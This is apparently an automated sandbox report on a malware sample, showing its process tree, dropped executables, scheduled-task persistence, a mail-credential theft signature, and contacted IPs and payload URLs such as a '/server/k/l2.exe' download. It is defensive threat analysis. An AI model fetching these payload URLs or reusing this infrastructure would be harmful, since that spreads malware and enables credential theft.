behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429350 Sample: file.exe Startdate: 22/04/2024 Architecture: WINDOWS Score: 100 60 ipinfo.io 2->60 62 easy2buy.ae 2->62 64 db-ip.com 2->64 72 Snort IDS alert for network traffic 2->72 74 Multi AV Scanner detection for domain / URL 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 6 other signatures 2->78 9 file.exe 2 97 2->9         started        14 oobeldr.exe 2->14         started        16 MSIUpdaterV2.exe 2->16         started        18 8 other processes 2->18 signatures3 process4 dnsIp5 66 193.233.132.175, 49710, 80 FREE-NET-ASFREEnetEU Russian Federation 9->66 68 193.233.132.47, 49707, 49721, 50500 FREE-NET-ASFREEnetEU Russian Federation 9->68 70 3 other IPs or domains 9->70 52 C:\Users\user\...\zy4GXi5yvCrsiS0ulH8Z.exe, MS-DOS 9->52 dropped 54 C:\Users\user\...\hcMSmyGUCSEFc2FAKlzc.exe, MS-DOS 9->54 dropped 56 C:\Users\user\AppData\Local\...dgeMS2.exe, MS-DOS 9->56 dropped 58 8 other malicious files 9->58 dropped 86 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->86 88 Tries to steal Mail credentials (via file / registry access) 9->88 90 Found stalling execution ending in API Sleep call 9->90 98 4 other signatures 9->98 20 zy4GXi5yvCrsiS0ulH8Z.exe 1 9->20         started        24 hcMSmyGUCSEFc2FAKlzc.exe 9->24         started        26 schtasks.exe 1 9->26         started        32 3 other processes 9->32 92 Antivirus detection for dropped file 14->92 94 Multi AV Scanner detection for dropped file 14->94 96 Detected unpacking (changes PE section rights) 14->96 28 schtasks.exe 1 14->28         started        30 schtasks.exe 1 18->30         started        file6 signatures7 process8 file9 50 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 20->50 dropped 80 Antivirus detection for dropped file 20->80 82 Multi AV Scanner detection for dropped file 20->82 84 Detected unpacking (changes PE section rights) 20->84 34 schtasks.exe 1 20->34         started        36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        44 conhost.exe 32->44         started        46 conhost.exe 32->46         started        signatures10 process11 process12 48 conhost.exe 34->48         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
193.233.132.47
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
104.26.5.15
 db-ip.com United States
13335 CLOUDFLARENETUS false
193.233.132.175
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
185.199.220.53
 easy2buy.ae United Kingdom
12488 KRYSTALGR false

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
easy2buy.ae 185.199.220.53 true
db-ip.com 104.26.5.15 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipinfo.io/widget/demo/81.181.57.52 false
    		high
    https://easy2buy.ae/wp-content/upgrade/k.exe false unknown
    http://193.233.132.175/server/k/l2.exe true unknown
    https://db-ip.com/demo/home.php?s=81.181.57.52 false
      		high